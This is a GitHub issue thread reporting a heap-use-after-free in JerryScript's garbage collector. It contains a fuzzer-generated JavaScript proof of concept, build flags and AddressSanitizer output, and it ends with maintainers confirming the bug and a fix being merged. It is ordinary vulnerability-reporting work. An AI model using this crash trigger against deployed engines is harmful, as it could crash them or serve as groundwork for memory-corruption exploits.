jerryscript-project/jerryscript #4870: AddressSanitizer: heap-use-after-free jerry-core/ecma/base/ecma-gc.c:90 in ecma_gc_set_object_visited

eternalsakura, 2021-12-09:
## JerryScript commit hash
55acdf2048b390d0f56f12e64dbfb2559f0e70ad

## Build platform
Ubuntu 20.04 LTS

## Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20
```

## poc
```
async function f() {
    let arr = [0.000000];
    let fuzz_v152 = arr;
    let fuzz_v159 = fuzz_v152.__proto__;
    fuzz_v152.valueOf = function* (fuzz_v166, fuzz_v167) {
        while (arr) {
        }
        var fuzz_v172 = ~f;
        arr >>= [1.100000];
        return fuzz_v167;
    };
    arr.includes(arr, [340282346638528859811704183484516925440.000000], arr);
    delete [10];
    let fuzz_v253 = f.__proto__;
    let fuzz_v256 = {
        "D5FP8": f
    };
    arr["map"](f, new Object(true));
    arr.flat();
    let fuzz_v69 = false;
    await this;
    await f;
    var fuzz_v43 = arr -= new Date(new String({
        "findIndex": arr
    }));
    await this;
    let fuzz_v286 = Symbol.reject();
    await f;
    await new Promise(f);
    await new Promise(async function* (fuzz_v80) {
        var fuzz_v82 = new Uint32Array(fuzz_v80, arr, [1.100000], fuzz_v80, fuzz_v80);
        let fuzz_v96 = fuzz_v82.__proto__;
        this.length = 4;
    });
    await new Promise(async function* (fuzz_v138, fuzz_v139) {
        fuzz_v138.__proto__ = fuzz_v139;
        let fuzz_v147 = function* (fuzz_v149, fuzz_v150, fuzz_v151, fuzz_v152) {
            let fuzz_v165 = Reflect.apply(fuzz_v152, {
                "findIndex": fuzz_v150
            }, [{}]);
            switch ({
                    includes: fuzz_v138,
                    set valueOf(fuzz_v175) {
                        fuzz_v150.valueOf = fuzz_v175;
                        return;
                    }
                }) {
            case [1.100000]:
                throw arr;
                break;
            case 5643033980980220.000000:
                let fuzz_v203 = String.prototype.trim.call(new String());
                break;
            default:
                fuzz_v43.valueOf = fuzz_v150;
            }
            let fuzz_v214 = fuzz_v69;
[... 117 lines cut ...]
  0x3e9c03b0: fd fd fd fd fa fa 00 00 00 fa fa fa 00 00 00 fa
  0x3e9c03c0: fa fa fd fd fd fd fa fa fd fd fd fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2066102==ABORTING

```

eternalsakura, 2021-12-09:
I refer to the compiled config from (https://github.com/jerryscript-project/jerryscript/issues/4848). 
Can you reproduce and confirm this problem?

eternalsakura, 2021-12-09:
Do you have a suitable compile config for fuzzing?
I can use it directly, thanks

eternalsakura, 2021-12-09:
I have a little doubt about --system-allocator=on, should I enable it?

eternalsakura, 2021-12-09:
For example, I have a problem now. When --system-allocator=on and stack-limit is 20, I can trigger a stack overflow, but this stack overflow cannot trigger it when system-allocator=off .

In the same way, I have another poc, the situation is just the opposite, so I am here to ask for your suggestions, which configuration poc do you accept

eternalsakura, 2021-12-09:
Can you confirm if this is a valid issue? thanks :)

rerobika, 2021-12-09:
Yep, that's a valid issue.

rerobika, 2021-12-09:
However, this test is a nightmare to debug. I'd definitely recommend some kind of test reduction. Please check https://github.com/renatahodovan/picire or https://github.com/renatahodovan/picireny. @hope-fly PTAL as well.

eternalsakura, 2021-12-09:
> However, this test is a nightmare to debug. I'd definitely recommend some kind of test reduction. Please check https://github.com/renatahodovan/picire or https://github.com/renatahodovan/picireny. @hope-fly PTAL as well.

In fact, I tried to reduce this poc, but it did not work well.

I will think of some other ways, and I will communicate with you if I have gained something.

hope-fly, 2021-12-09:
@rerobika ok，I'll TAL tomorrow

PR #5169 (2024-11-19): Put reference on executable object's this_binding to avoid unwanted f…
…rees before exiting execution

This patch fixes #4870.

The implementation is based on PR #4966, only resolved the conflicts and applied requested changes.

JerryScript-DCO-1.0-Signed-off-by: Gergo Csizi gergocs@inf.u-szeged.hu
closed 2024-11-19 by robertsipka